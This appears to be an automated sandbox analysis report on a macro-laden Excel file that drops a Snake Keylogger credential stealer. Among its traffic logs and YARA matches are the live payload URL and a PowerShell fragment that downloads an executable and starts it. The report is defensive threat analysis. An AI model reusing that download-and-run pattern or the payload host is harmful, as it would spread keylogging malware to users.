Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443

Networking

Source: Yara match

File source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: global traffic

HTTP traffic detected: GET /2ed7362e959d42385d4e6d231a6840dd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: cia.tfConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.22:49161 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51AE0962.png

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /2ed7362e959d42385d4e6d231a6840dd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: cia.tfConnection: Keep-Alive

Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: cia.tf

Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
Source: tmp667.exe, 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: powershell.exe, 00000002.00000002.377877321.0000000003F47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cia.tf
Source: powershell.exe, 00000002.00000002.384599695.000000001C47E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000002.00000002.384599695.000000001C47A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: powershell.exe, 00000002.00000002.377877321.00000000039FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: tmp667.exe, 00000005.00000002.446119875.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microso
Source: powershell.exe, 00000002.00000002.377877321.000000000259B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://ocsps.ssl.com0
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://ocsps.ssl.com0?
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://ocsps.ssl.com0_
Source: powershell.exe, 00000002.00000002.377877321.0000000002391000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.446711663.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: powershell.exe, 00000002.00000002.377877321.0000000003F2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cia.tf
Source: powershell.exe, 00000002.00000002.377877321.0000000004152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F2F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe
Source: powershell.exe, 00000002.00000002.377790534.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.384599695.000000001C4B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;
Source: powershell.exe, 00000002.00000002.377772524.00000000003D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;:
Source: powershell.exe, 00000002.00000002.377761940.00000000002C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;J
Source: powershell.exe, 00000002.00000002.383828170.000000001A815000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;N
Source: powershell.exe, 00000002.00000002.384433088.000000001B146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe-OutFile$TempFile;Start-Process$TempFile;t
Source: vbaProject.bin	String found in binary or memory: https://cia.tf/2ed7362e959d42385d4e6d231a6840ddB.
Source: powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000002.00000002.377877321.000000000259B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383414750.00000000123C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: tmp667.exe, 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.383828170.000000001A857000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.dr	String found in binary or memory: https://www.ssl.com/repository0

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161

System Summary

Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: DGTCkacbSz.xlsx	OLE, VBA macro line: Set Hthql = CreateObject("WScript.Shell")
Source: 79E20000.0.dr	OLE, VBA macro line: Set Hthql = CreateObject("WScript.Shell")

Source: DGTCkacbSz.xlsx	Stream path 'VBA/ThisWorkbook' : found hex strings
Source: 79E20000.0.dr	Stream path 'VBA/ThisWorkbook' : found hex strings

Source: C:\Users\user\AppData\Local\Temp\tmp667.exe

File dump: svcost.exe.5.dr 262244634

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\tmp667.exe

Jump to dropped file

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Memory allocated: 770B0000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Memory allocated: 770B0000 page execute and read and write			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_001C8A10		5_2_001C8A10
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_001CCAD8		5_2_001CCAD8
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_001C8A00		5_2_001C8A00
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006BF0E8		5_2_006BF0E8
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006BF0D8		5_2_006BF0D8
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006B08A8		5_2_006B08A8
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006B0C56		5_2_006B0C56
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006D0040		5_2_006D0040
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006DC858		5_2_006DC858
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006D19A3		5_2_006D19A3
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006DD500		5_2_006DD500
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006D6858		5_2_006D6858
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006D0021		5_2_006D0021
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006D40F8		5_2_006D40F8
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006DC088		5_2_006DC088
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Code function: 5_2_006D4108		5_2_006D4108
